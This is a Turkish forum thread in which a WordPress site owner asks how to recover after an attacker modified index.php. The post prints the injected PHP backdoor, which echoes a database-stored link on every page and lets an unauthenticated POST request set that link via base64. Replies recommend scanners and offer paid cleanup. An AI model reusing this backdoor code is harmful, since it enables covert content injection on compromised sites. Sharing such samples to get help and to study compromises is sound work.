• 24-03-2022, 14:53:39
    #1
    Merhaba,

    Dun gece birisi index.php dosyasini degistirip asagida ki kodu yerlestirmis? Bu durumdan nasil kurtulabilirim? index.php dosyasini wordpresste ki degismemis halini atsam bir sikinti yasar miyim ve sorunu cozer mi?

    Sorunu profesyonel sekilde tekrarlanmiyacak sekilde cozebilecek birini ariyorum.

    Degistirilen index.php dosyasi:
    <?php
    
    
    
        # only wp
    
    define( 'WP_USE_THEMES', true );
    
    @require __DIR__ . '/wp-blog-header.php';
    
    
    
    # only wp 2
    
    @$index_link = get_option('index_link');
    
    
    
    if (@strstr($index_link, "http"))
    
    {
    
        $index_link = str_replace("", ">", $index_link);
    
    }
    
    
    
    if (@strlen($index_link) > 1){
    
        echo $index_link;
    
    }
    
    
    
    if(isset($_POST['wp_index_link'])){
    
        $wp_index_link = $_POST['wp_index_link'];
    
        global $wpdb;
    
        $prefix = $wpdb->prefix;
    
        $index_link = get_option('index_link');
    
        if (strlen($index_link) < 1)
    
        {
    
            $wp_index_link = base64_decode($wp_index_link);
    
            $wp_index_link = $wpdb->_real_escape($wp_index_link);
    
            $usql = "INSERT INTO  " . $prefix . "options (option_name, option_value, autoload) VALUES('index_link', '" . $wp_index_link . "', 'yes');";
    
            $results = $wpdb->get_results($usql);
    
            echo "<br>index link insert set ok";
    
        }
    
        if (strlen($index_link) > 1){
    
            $wp_index_link = base64_decode($wp_index_link);
    
            $wp_index_link = $wpdb->_real_escape($wp_index_link);
    
            echo $usql = "UPDATE " . $prefix . "options SET option_value='" . $wp_index_link . "' WHERE option_name='index_link';";
    
            echo "<hr>";
    
            $results = $wpdb->get_results($usql);
    
            echo "<br>index link update ok";
    
        }
    
    }
    Orjinal index.php dosyasi :

    <?php
    /**
    * Front to the WordPress application. This file doesn't do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */
    
    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
    ?>
    Tesekkurler.
  • 24-03-2022, 14:57:13
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    link vs index le alaklı plugin kurdunuz mu hocam
  • 24-03-2022, 14:59:31
    #3
    Yok daha once publish press eklentisinde acik cikmisti o zaman bir sizinti oldu ondan sonra bir turlu duzelmedi sistem. Ara ara admin hesap aciyorlardi ben siliyordum manuel ama ilk defa dosya degisikligi yapildi bu zamana kadar.
  • 24-03-2022, 15:20:37
    #4
    expert_mert adlı üyeden alıntı: mesajı görüntüle
    Yok daha once publish press eklentisinde acik cikmisti o zaman bir sizinti oldu ondan sonra bir turlu duzelmedi sistem. Ara ara admin hesap aciyorlardi ben siliyordum manuel ama ilk defa dosya degisikligi yapildi bu zamana kadar.
    Benim sitelerede sızıntı olmuştu. Ben kendi makinamda barındırdığım için sitelerimi imunify 360 aldım ve bütün sitelerimi tarattım detaylıca. Imunify baştan sonra ne var ne yok temizledi. Gerçekten başarılı bir yazılım.
  • 24-03-2022, 15:25:26
    #5
    VelihanD adlı üyeden alıntı: mesajı görüntüle
    Benim sitelerede sızıntı olmuştu. Ben kendi makinamda barındırdığım için sitelerimi imunify 360 aldım ve bütün sitelerimi tarattım detaylıca. Imunify baştan sonra ne var ne yok temizledi. Gerçekten başarılı bir yazılım.
    immunifyAV de taratiyorum duzenli olarak ama birsey cikmiyor, immunify 360 fark ediyor mu gercekten?
  • 24-03-2022, 15:25:32
    #6
    Kurumsal PLUS
    Merhaba, sitenizi tarayabilirim. Farklı dosya veya veri tabaninizi kontrol edebilirim.
    Konum: https://www.r10.net/wordpress-seo-gu...e-buyurun.html
  • 24-03-2022, 15:31:45
    #7
    Uyumsuz adlı üyeden alıntı: mesajı görüntüle
    Merhaba, sitenizi tarayabilirim. Farklı dosya veya veri tabaninizi kontrol edebilirim.
    Konum: https://www.r10.net/wordpress-seo-gu...e-buyurun.html
    Kesin cozum saglayabilir misiniz hocam? Daha once formdan birine isi vermistim o an icin cozulmustu fakat tam anlamiyla guvenli hale gelmedi sistem. SQL injection var buyuk ihtimalle. Dedigim gibi ara ara admin hesabi olusturuyorlar.
  • 24-03-2022, 16:07:31
    #8
    expert_mert adlı üyeden alıntı: mesajı görüntüle
    immunifyAV de taratiyorum duzenli olarak ama birsey cikmiyor, immunify 360 fark ediyor mu gercekten?
    Kesin çözüm olur diye garanti veremem ama 360 AV’ın üst versiyonu. Benim sorunuma 360 çözüm oldu denemekte fayda var.
  • 24-03-2022, 17:50:43
    #9
    Kurumsal PLUS
    expert_mert adlı üyeden alıntı: mesajı görüntüle
    Kesin cozum saglayabilir misiniz hocam? Daha once formdan birine isi vermistim o an icin cozulmustu fakat tam anlamiyla guvenli hale gelmedi sistem. SQL injection var buyuk ihtimalle. Dedigim gibi ara ara admin hesabi olusturuyorlar.
    Dünyanın en büyük güvenlik firması bile kesin çözüm veremez. Kullandığınız hosting, sunucu, wordpress eklentiler temalar buna sebep olabilir.
    Hizmeti alırsınız virüslü veya yazılım açığı bulunan tema eklenti kullanıyorsanız bunlar çözülebilir mi buna bakarız.